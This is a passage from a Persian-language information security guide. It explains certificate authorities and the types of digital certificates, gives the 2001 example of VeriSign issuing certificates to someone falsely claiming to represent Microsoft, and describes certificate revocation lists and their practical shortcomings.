‫ﺍﻳﻦ ﻣﺠﻮﺯﻫﺎ "ﺧﻮﺩ ﺍﻣﻀﺎ" ﻫﺴﺘﻨﺪ ‪ -‬ﻳﻌﻨﻲ ﺑﺎ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺧﻮﺩ ‪ CA‬ﺍﻣﻀﺎ ﺷﺪﻩﺍﻧﺪ‪ .‬ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻫﻤﭽﻨﻴﻦ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺼﻮﺭﺕ‬
‫ﺯﻧﺠﻴﺮﻩﺍﻱ ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻲ ﻛﻨﻨﺪ ﻳﺎ ﻛﻠﻴﺪﻫﺎﻱ ﻳﻜﺪﻳﮕﺮ ﺭﺍ ﺍﻣﻀﺎ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﻳﻨﻜﻪ ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺯﻧﺠﻴﺮﻩﺍﻱ ﻭﺍﻗﻌﹰﺎ ﭼﻪ ﻣﻔﻬﻮﻣﻲ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ‬
‫ﻫﻤﭽﻨﺎﻥ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﺆﺍﻝ ﻣﻄﺮﺡ ﺍﺳﺖ‪ .‬ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪Netscape ،Microsoft Internet Explorer ،Microsoft Windows‬‬
‫‪ ،Navigator‬ﻭ ‪ ،open SSL‬ﻫﻤﻪ ﺑﻪ ﻫﻤﺮﺍﻩ ﺑﻴﺶ ﺍﺯ ﺩﻩ ﮔﻮﺍﻫﻲ ﺍﺯ ﻣﺮﺍﮐﺰ ﻣﺨﺘﻠﻒ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﺑﺎﺯﺍﺭ ﺗﻮﺯﻳﻊ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺩﺭ ﻓﻬﺮﺳﺖ ‪CA‬ﻫﺎﻳﻲ ﻛﻪ ﻫﻤﺮﺍﻩ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻭﺏ ﺗﻮﺯﻳﻊ ﺷﺪﻩﺍﻧﺪ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﮔﻮﺍﻫﻲ ﺩﺍﺭﻧﺪ‪ VerSign .‬ﺑﺎ ﺑـﻴﺶ ﺍﺯ‬
‫‪ ۲۰‬ﮔﻮﺍﻫﻲ ﻣﺨﺘﻠﻒ ﺑﻴﺸﺘﺮﻳﻦ ﺗﻌﺪﺍﺩ ﮔﻮﺍﻫﻲﻫﺎ ﺭﺍ ﺩﺍﺭﺩ‪ .‬ﺍﻣﻀﺎﻫﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻣﺘﻔﺎﻭﺕ ﺑﻴـﺎﻧﮕﺮ ﺳـﻄﻮﺡ ﻣﺨﺘﻠـﻒ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﺍﻋﺘﺒﺎﺭ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‬
‫ﺍﻳﻦ ﻣﺠﻮﺯﻫﺎ ﺷﺎﻣﻞ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ ،SSL‬ﻧـﺎﻡ ﺳـﺎﺯﻣﺎﻧﻲ ﻛـﻪ ﺁﻥ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺭﺍ ﺍﺟـﺮﺍ ﻣـﻲﻛﻨـﺪ‪ ،‬ﻭ ﻧـﺎﻡ ‪DNS‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺳﺖ‪ .‬ﻫﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﻗﺎﺑﻠﻴﺖ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎﻳﺪ ﻳﻚ ﮔـﻮﺍﻫﻲ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺑـﺮﺍﻱ ﭘﺮﻭﺗﻜـﻞ‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ‪ SSL‬ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺗﺎ ﺑﺘﻮﺍﻧﺪ ﺑﺪﺭﺳﺘﻲ ﻋﻤﻞ ﻛﻨﺪ‪ .‬ﺍﮔﺮﭼﻪ ﻫﺪﻑ ﺍﺻﻠﻲ ﺻﺪﻭﺭ ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ ﻛﻤﻚ ﺑـﻪ ﻣـﺸﺘﺮﻳﺎﻥ ﺩﺭ ﺗـﺸﺨﻴﺺ‬
‫‪137 Certification Practices Statement‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪٣٢٣‬‬
‫ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﻭ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺣﻤﻼﺕ ﻓﺮﺩ‪-‬ﺩﺭ‪-‬ﻣﻴﺎﻥ‪-‬ﺭﺍﻩ‪ ١٣٨‬ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺩﺭ ﻋﻤـﻞ ﻣﺠﻮﺯﻫـﺎﻱ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺑـﻴﺶ ﺍﺯ‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪.‬‬
‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﺷﺨﺼﻲ‬
‫ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ ﺷﺎﻣﻞ ﻧﺎﻡ ﻳﻚ ﺷﺨﺺ ﻭ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮﻱ ﻣﺎﻧﻨﺪ ﺁﺩﺭﺱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪ ،‬ﺁﺩﺭﺱ‬
‫ﭘﺴﺘﻲ‪ ،‬ﻭ ﺗﺎﺭﻳﺦ ﺗﻮﻟﺪ ﺷﺨﺺ ﺭﺍ ﻧﻴﺰ ﺷﺎﻣﻞ ﺷﻮﻧﺪ‪ .‬ﺁﻧﻬﺎ ﺑﻮﺳﻴﻠﺔ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺮﺍﻱ ﺷﺎﻏﻠﻴﻦ ﻳﺎ ﻣﺸﺘﺮﻳﺎﻧﺸﺎﻥ ﺻﺎﺩﺭ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻣﺠﻮﺯﻫﺎﻱ ﺷﺨﺼﻲ‬
‫ﺫﺍﺗﹰﺎ ﻳﻚ ﺭﻭﺵ ﺍﻳﻤﻦﺗﺮ ﺑﺮﺍﻱ ﺁﻥ ﺍﺳﺖ ﻛﻪ ﺍﻓﺮﺍﺩ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺧﻮﺩﺷﺎﻥ ﺭﺍ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻭ ﺷﻨﺎﺳﻪ ﻛﺎﺭﺑﺮﻱ ﻣﻌﺮﻓـﻲ ﻛﻨﻨـﺪ‪ .‬ﺁﻧﻬـﺎ ﻫﻤﭽﻨـﻴﻦ‬
‫ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﭘﺮﻭﺗﻜﻞ ﺭﻣﺰﻧﮕﺎﺭﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ‪ S/MIME‬ﻻﺯﻡ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ‬
‫ﺍﻳﻦ ﻣﺠﻮﺯﻫﺎ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﺍﻣﻀﺎﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪ ،‬ﻣﺎﻧﻨﺪ ﺍﺟﺰﺍﻱ ‪ ActiveX‬ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﻗﺎﺑﻞ ﺩﺭﻳﺎﻓـﺖ ﺍﺯ‬
‫ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ‪ .‬ﻫﺮﻳﻚ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﺍﺧﻴﺮ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ‪ Windows‬ﺑﻪ ﻫﻤﺮﺍﻩ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺗﻮﺯﻳﻊﻛﻨﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻨﺘﺸﺮ‬
‫ﺷﺪﻩ ﻛﻪ ﻫﺮ ﻛﺪﺍﻡ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﺻﺤﺖ ﺍﻣﻀﺎﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺭﻭﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ‪ Windows‬ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪.‬‬
‫ﻣﺠﻮﺯﻫﺎﻱ ﺍﻓﺸﺎﻱ ﺣﺪﺍﻗﻞ‬
‫ﻣﺠﻮﺯﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺮﺍﻱ ﺯﻧﺪﮔﻲ ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺧـﻮﺩ ﻳـﻚ ﺗﻬﺪﻳـﺪ ﺑـﻪ ﻫﻤـﺮﺍﻩ ﺩﺍﺭﻧـﺪ‪ .‬ﺯﻣﺎﻧﻴﻜـﻪ ﺷـﻤﺎ ﻳـﻚ ﮔـﻮﺍﻫﻲ ﺭﺍ ﺑـﻪ ﻳـﻚ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻴﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺁﺳﺎﻧﻲ ﻫﻤﺔ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﻫﻮﻳﺖ ﺷﻤﺎ ﻛـﻪ ﺭﻭﻱ ﮔـﻮﺍﻫﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ )ﭼـﻪ‬
‫ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺗﻮﺳﻂ ﺁﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻻﺯﻡ ﺑﺎﺷﺪ ﻭ ﭼﻪ ﻻﺯﻡ ﻧﺒﺎﺷﺪ( ﺭﺍ ﺛﺒﺖ ﻛﻨﺪ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣـﻮﺍﺭﺩ ﺳـﺎﺯﻣﺎﻧﻲ ﻛـﻪ ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺩﺭ‬
‫ﻛﺎﺭﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺑﺪﺳﺖ ﻣﻲﺁﻭﺭﺩ ﺁﺯﺍﺩ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﻫﺮ ﻛﺎﺭﻱ ﻛﻪ ﺧﻮﺍﺳﺖ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪.‬‬
‫ﻳﻚ ﺭﻭﺵ ﺑﺮﺍﻱ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻥ ﺗﻬﺪﻳﺪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺠﻮﺯﻫﺎﻱ ﺍﻓﺸﺎﻱ ﺣﺪﺍﻗﻞ‪ ١٣٩‬ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻣﺠﻮﺯﻫﺎ ﺑﻪ ﻣﺎﻟﻜﺎﻥ ﺧـﻮﺩ‬
‫ﻼ ﺯﻧـﻲ‬
‫ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺑﺼﻮﺭﺕ ﺍﻧﺘﺨﺎﺑﻲ ﻗﺴﻤﺘﻬﺎﻱ ﺧﺎﺻﻲ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﻣﺠﻮﺯ ﻣﻨﺘﺸﺮ ﻛﻨﻨﺪ‪ ،‬ﺑﺪﻭﻥ ﺁﻧﻜﻪ ﻗﺴﻤﺘﻬﺎﻱ ﺩﻳﮕﺮ ﻓﺎﺵ ﺷﻮﻧﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﻛﻪ ﻣﻲﺧﻮﺍﻫﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﮔﺮﻭﻩ ﻗﺮﺑﺎﻧﻴﺎﻥ ﺳﺮﻃﺎﻥ ﻭﺍﺭﺩ ﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻣﺠﻮﺯﻫﺎﻱ ﺍﻓﺸﺎﻱ ﺣﺪﺍﻗﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﺗﺎ ﺑﻪ ﺳـﺎﻳﺖ ﻭﺏ ﺛﺎﺑـﺖ‬
‫ﻛﻨﺪ ﻛﻪ ﺍﻭ ﻳﻚ ﺯﻥ ﺑﺎﻻﻱ ‪ ۲۱‬ﺳﺎﻝ ﺍﺳﺖ ﻛﻪ ﺳﺮﻃﺎﻥ ﺳﻴﻨﻪ ﺩﺍﺭﺩ‪ ،‬ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﻧﺎﻡ ﻳﺎ ﺁﺩﺭﺳﺶ ﻓـﺎﺵ ﮔـﺮﺩﺩ‪ .‬ﻣﻔﻬـﻮﻡ ﻣﺠﻮﺯﻫـﺎﻱ ﺍﻓـﺸﺎﻱ‬
‫ﺣﺪﺍﻗﻞ ﺗﻮﺳﻂ ﻳﻚ ﺭﻳﺎﺿﻴﺪﺍﻥ ﺑﻪ ﻧﺎﻡ ﺍﺳﺘﻔﺎﻥ ﺑﺮﻧﺪﺯ‪ ١٤٠‬ﺍﺑـﺪﺍﻉ ﺷـﺪ ﻭ ﺩﺭ ﻣـﺎﻩ ﻓﻮﺭﻳـﻪ ﺳـﺎﻝ ‪ ۲۰۰۰‬ﮔـﻮﺍﻫﻲ ﺍﻧﺤـﺼﺎﺭﻱ ﺷـﺮﻛﺖ ﻛﺎﻧـﺎﺩﺍﻳﻲ‬
‫‪ ١٤١Zero Knowledge Systems‬ﺭﺍ ﻛﺴﺐ ﻛﺮﺩ‪.‬‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‪ ،‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺑﻔﻬﻤﺪ ﻛﻪ ﺩﭼﺎﺭ ﺍﺷﺘﺒﺎﻩ ﺷﺪﻩ ﺍﺳﺖ ﻳﺎ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﮔﺮﻓﺘﻪ ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﺪ ﮔﻮﺍﻫﻲ ﻣﺮﺑﻮﻃﻪ ﺭﺍ ﺑﺎﻃﻞ ﻛﻨﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺯﻣﺎﻧﻴﻜﻪ ﻣﺪﺕ ﺍﻋﺘﺒﺎﺭ ﻫﺮﻳﻚ ﺍﺯ ﻣﺸﺘﺮﻛﻴﻦ ﺑﻪ ﭘﺎﻳـﺎﻥ ﻣـﻲﺭﺳـﺪ ﮔـﻮﺍﻫﻲ ﺍﻭ ﺑﺎﻳـﺪ‬
‫ﺍﺑﻄﺎﻝ ﺷﻮﺩ‪.‬‬
‫ﻧﻴﺎﺯ ﺑﻪ ﻳﻚ ﻣﻜﺎﻧﻴﺰﻡ ﻋﻤﻠﻲ ﺍﺑﻄﺎﻝ ﺩﺭ ﻣﺎﺭﺱ ﺳﺎﻝ ‪ ۲۰۰۱‬ﻛﺎﻣ ﹰ‬
‫ﻼ ﺭﻭﺷﻦ ﺷﺪ‪ ،‬ﺯﻣﺎﻧﻴﻜﻪ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﺍﻋـﻼﻡ ﻛـﺮﺩ ﻛـﻪ ‪ VeriSign‬ﺑـﺮﺍﻱ‬
‫ﻓﺮﺩﻱ ﻛﻪ ﺑﻪ ﺩﺭﻭﻍ ﺍﺩﻋﺎ ﻣﻲﻛﻨﺪ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﺳﺖ ﻭ ﻧﺎﻣﻲ ﻛﻪ ﺑﻌﻨﻮﺍﻥ ﺷﺮﻛﺖ ﻣﺤﻞ ﻛﺎﺭ ﺍﻭ ﺩﺭ ﻫﺮ ﺩﻭ ﻣﺠﻮﺯ ﺛﺒﺖ ﺷﺪﻩ‬
‫ﺷﺮﻛﺖ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﺳﺖ‪ ،‬ﺩﺭ ﻣﺎﻩ ﮊﺍﻧﻮﻳﻪ ﺩﻭ ﻣﺠﻮﺯ ﺻﺎﺩﺭ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﺷﺎﺭﻩ ﻛﺮﺩ ﻛﻪ "ﺗﻮﺍﻧﺎﻳﻲ ﺍﻣﻀﺎﻱ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺟﺮﺍﻳـﻲ ﺑـﺎ‬
‫‪Man-in-the-Middle‬‬
‫‪Minimal Disclosure Certificates‬‬
‫‪Stefan Brands‬‬
‫‪http://www.wired.com/news/technology/0,1282,34496,00.html‬‬
‫‪138‬‬
‫‪139‬‬
‫‪140‬‬
‫‪141‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺍﺑﻄﺎﻝ‬
‫‪٣٢٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻳﻲ ﻣﺪﻋﻲ ﻫﺴﺘﻨﺪ ﺑﻪ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺗﻌﻠﻖ ﺩﺍﺭﻧﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﻴﻨﻲ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍ ﻭﺍﺩﺍﺭ ﺑـﻪ ﭘـﺬﻳﺮﺵ‬
‫‪١٤٢‬‬
‫ﺍﺟﺮﺍﻱ ﺁﻥ ﻓﺎﻳﻠﻬﺎ ﻛﻨﻨﺪ ﻣﻨﺎﻓﻌﻲ ﺯﻳﺎﺩﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ"‪.‬‬
‫ﻓﻬﺮﺳﺖﻫﺎﻱ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺑﺎﻃﻠﻪ‬
‫ﻳﻚ ﺷﻴﻮﻩ ﺑﺮﺍﻱ ﺍﺑﻄﺎﻝ‪ ،‬ﺍﻧﺘﺸﺎﺭ ﻓﻬﺮﺳﺖ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺑﺎﻃﻠﻪ )‪ ١٤٣(CRL‬ﺍﺳﺖ‪ .‬ﻳﻚ ‪ CRL‬ﻓﻬﺮﺳﺘﻲ ﺍﺳﺖ ﺍﺯ ﻫﻤﺔ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛـﻪ ﺗﻮﺳـﻂ‬
‫‪ CA‬ﺑﺎﻃﻞﺷﺪﻩﺍﻧﺪ ﻭ ﺑﻪ ﺩﻻﻳﻞ ﻣﺨﺘﻠﻒ ﻫﻨﻮﺯ ﻣﻨﻘﻀﻲ ﻧﺸﺪﻩﺍﻧﺪ‪ .‬ﺩﺭ ﺣﺎﻟﺖ ﺍﻳﺪﻩﺁﻝ ﻫﺮ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﻓﻮﺍﺻﻞ ﺯﻣـﺎﻧﻲ ﻣـﻨﻈﻢ ﻳـﻚ‬
‫‪ CRL‬ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﺪ‪ CRL .‬ﺩﺭ ﻛﻨﺎﺭ ﻓﻬﺮﺳﺖ ﻛﺮﺩﻥ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺍﺑﻄﺎﻝ ﺷﺪﻩ‪ ،‬ﻣﺪﺕ ﺯﻣﺎﻥ ﺍﻋﺘﺒﺎﺭ ﺩﺍﺷﺘﻦ ﺧـﻮﺩ ﻭ ﻧﺤـﻮﺓ ﺩﺭﻳﺎﻓـﺖ ‪CRL‬‬
‫ﺑﻌﺪﻱ ﺭﺍ ﻧﻴﺰ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﮔﻮﺍﻫﻲﻫﺎﻱ ‪ X.509 v3‬ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﻗﺴﻤﺘﻲ ﺑﺎﺷﻨﺪ ﻛﻪ ﻧﻘﻄﺔ ﺗﻮﺯﻳﻊ ‪ ١٤٤(CDP) CRL‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﺩ‪ .‬ﺍﺯ ﻟﺤـﺎﻅ ﻧﻈـﺮﻱ‪،‬‬
‫ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺍﻋﺘﺒﺎﺭ ﻳﻚ ﮔﻮﺍﻫﻲ ﺭﺍ ﺗﺼﺪﻳﻖ ﻛﻨﺪ ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﺪ ﻳﻚ ‪ CRL‬ﺭﺍ ﺍﺯ ‪ CDP‬ﻣﺮﺑﻮﻃﻪ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ﺗﺎ ﺑﺘﻮﺍﻧﺪ ﻣﻌﻴﻦ ﻛﻨﺪ ﻛﻪ‬
‫ﺁﻳﺎ ﮔﻮﺍﻫﻲ ﺍﺑﻄﺎﻝ ﺷﺪﻩ ﺍﺳﺖ ﻳﺎ ﻧﻪ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺑﻴﺸﺘﺮ ﮔﻮﺍﻫﻲﻫﺎ ﺗﻮﺳﻂ ﺗﻌﺪﺍﺩ ﺍﻧﺪﻛﻲ ﺍﺯ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺻﺎﺩﺭ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻣﻨﻄﻘﻲ ﺍﺳـﺖ‬
‫ﺍﮔﺮ ﺗﺼﻮﺭ ﻛﻨﻴﻢ ﻛﻪ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻣﻲﺗﻮﺍﻧﺪ ‪ CRL‬ﺟﺪﻳﺪ ﺭﺍ ﻫﺮ ﺭﻭﺯ ﻳﺎ ﻫﺮ ﺳﺎﻋﺖ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ‪ ،‬ﻭ ﺁﻧﮕﺎﻩ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﺭﺍ ﺑـﺮﺍﻱ ﺟـﺴﺘﺠﻮﻫﺎﻱ‬
‫ﭘﻴﺎﭘﻲ ﺩﺭ ﺣﺎﻓﻈﻪ ﻧﮕﻪ ﺩﺍﺭﺩ‪ .‬ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻛﻪ ﺍﺭﺗﺒﺎﻁ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﺤﺪﻭﺩ ﺩﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻜﺒﺎﺭ ‪ CRL‬ﺭﺍ ‪ download‬ﻭ ﺁﻧﺮﺍ ﻣﻴـﺎﻥ ﻛـﺎﺭﺑﺮﺍﻧﺶ‬
‫ﺗﻮﺯﻳﻊ ﻛﻨﺪ‪.‬‬
‫ﺩﺭ ﻋﻤﻞ‪CRL ،‬ﻫﺎ ﻭ ‪CDP‬ﻫﺎ ﭼﻨﺪﻳﻦ ﻣﺸﻜﻞ ﺩﺍﺭﻧﺪ‪:‬‬
‫•‬
‫•‬
‫•‬
‫ﺍﮔﺮ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺧﻴﻠﻲ ﻣﺸﻬﻮﺭ ﺑﺎﺷﺪ ﺍﺣﺘﻤﺎﻝ ﺩﺍﺭﺩ ﻛﻪ ‪CRL‬ﻫﺎ ﺧﻴﻠﻲ ﺑﺰﺭﮒ ﺑﺎﺷـﻨﺪ‪ Download .‬ﻛـﺮﺩﻥ ﻳـﻚ ﻓﻬﺮﺳـﺖ‬
‫ﻼ ‪ ۹۰۰‬ﻛﻴﻠﻮﺑﺎﻳﺖ ﺍﺯ ﻃﺮﻳﻖ ﺍﺗﺼﺎﻝ ﺗﻠﻔﻨﻲ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ SSL‬ﻣﺮﮐـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ‪ VeriSign‬ﻣﻤﮑـﻦ‬
‫‪ CRL‬ﺑﺎ ﺣﺠﻢ ﻣﺜ ﹰ‬
‫ﺍﺳﺖ ﺑﻴﺶ ﺍﺯ ‪ ۲۰‬ﺩﻗﻴﻘﻪ ﻭﻗﺖ ﺑﮕﻴﺮﺩ؛‬
‫ﻣﻴﺎﻥ ﺯﻣﺎﻧﻲ ﻛﻪ ﮔﻮﺍﻫﻲ ﺍﺑﻄﺎﻝ ﻣﻲﺷﻮﺩ ﻭ ﺯﻣﺎﻧﻲ ﻛﻪ ‪ CRL‬ﺟﺪﻳﺪ ﺗﻮﺯﻳﻊ ﻣﻲﺷﻮﺩ ﻳﻚ ﺑـﺎﺯﺓ ﺯﻣـﺎﻧﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺩﺭ ﺁﻥ ﮔـﻮﺍﻫﻲ‬
‫ﻣﻌﺘﺒﺮ ﺑﻨﻈﺮ ﻣﻲﺁﻳﺪ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﻳﻨﮕﻮﻧﻪ ﻧﻴﺴﺖ؛ ﻭ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎ‪CRL ،‬ﻫﺎ ﻭ ‪CDP‬ﻫﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻤﻲﻛﻨﻨﺪ‪.‬‬
